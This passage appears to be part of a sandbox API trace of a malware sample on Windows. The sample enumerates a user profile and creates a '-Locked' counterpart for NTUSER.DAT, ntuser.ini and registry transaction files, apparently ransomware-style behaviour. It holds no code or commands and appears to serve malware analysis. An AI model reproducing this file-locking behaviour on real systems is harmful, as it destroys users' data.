lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x72 [0301.879] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms-Locked", lpFilePart=0x0) returned 0x79 [0301.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.879] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000001.regtrans-ms-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.879] GetFileType (hFile=0x49c) returned 0x1 [0301.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.880] GetFileType (hFile=0x49c) returned 0x1 [0301.884] CloseHandle (hObject=0x49c) returned 1 [0301.884] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x72 [0301.884] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms-Locked", lpFilePart=0x0) returned 0x79 [0301.884] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.884] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.dat{62e13464-7ee5-11e5-80c4-a4badb40df56}.tmcontainer00000000000000000002.regtrans-ms-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.890] GetFileType (hFile=0x49c) returned 0x1 [0301.890] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.890] GetFileType (hFile=0x49c) returned 0x1 [0301.892] CloseHandle (hObject=0x49c) returned 1 [0301.892] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini", lpFilePart=0x0) returned 0x20 [0301.893] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini-Locked", lpFilePart=0x0) returned 0x27 [0301.893] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0301.893] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\ntuser.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\ntuser.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0301.894] GetFileType (hFile=0x49c) returned 0x1 [0301.894] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0301.894] GetFileType (hFile=0x49c) returned 0x1 [0301.896] CloseHandle (hObject=0x49c) returned 1 [0301.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af19c) returned 1 [0301.896] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x1aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x15 [0301.896] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\", lpFilePart=0x0) returned 0x16 [0301.896] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*", lpFindFileData=0x1aeec4 | out: lpFindFileData=0x1aeec4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0301.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0301.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0301.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0301.898] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0301.898] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0301.898] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x32df1a0f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32df1a0f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0301.899] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3386e285, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3386e285, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0301.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0301.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0301.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0301.900] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0301.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb45c2764, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb45c2764, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0301.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0301.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0301.901] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf3d0952f, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf3d0952f, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0301.902] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32d4f49d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34507af7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked", cAlternateFileName="NTUSER~1.DAT")) returned 1 [0301.902] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3450efd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3450efd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3450efd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked-Locked", cAlternateFileName="NTUSER~2.DAT")) returned 1 [0301.902] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x59400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0301.903] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34532582, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34532582, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34532582, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1-Locked", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0301.903] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0301.903] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3453af3e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3453af3e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3453af3e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2-Locked", cAlternateFileName="NTUSER~4.LOG")) returned 1 [0301.904] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0301.904] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345437ce, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345437ce, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345437ce, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf-Locked", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0301.904] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0301.904] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3454ac95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3454ac95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3454ac95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms-Locked", cAlternateFileName="NTUSER~3.REG")) returned 1 [0301.905] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0301.905] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345583f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345583f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345583f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms-Locked", cAlternateFileName="NTUSER~4.REG")) returned 1 [0301.905] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0301.906] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3456e292, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini-Locked", cAlternateFileName="NTUSER~1.INI")) returned 1 [0301.906] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x84aeda3c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84aeda3c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0301.906] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb4766337, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb4766337, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0301.906] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0301.906] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0301.907] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43754b80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0301.907] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437a1142, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437a1142, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0301.907] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0301.907] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeed4 | out: lpFindFileData=0x1aeed4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, 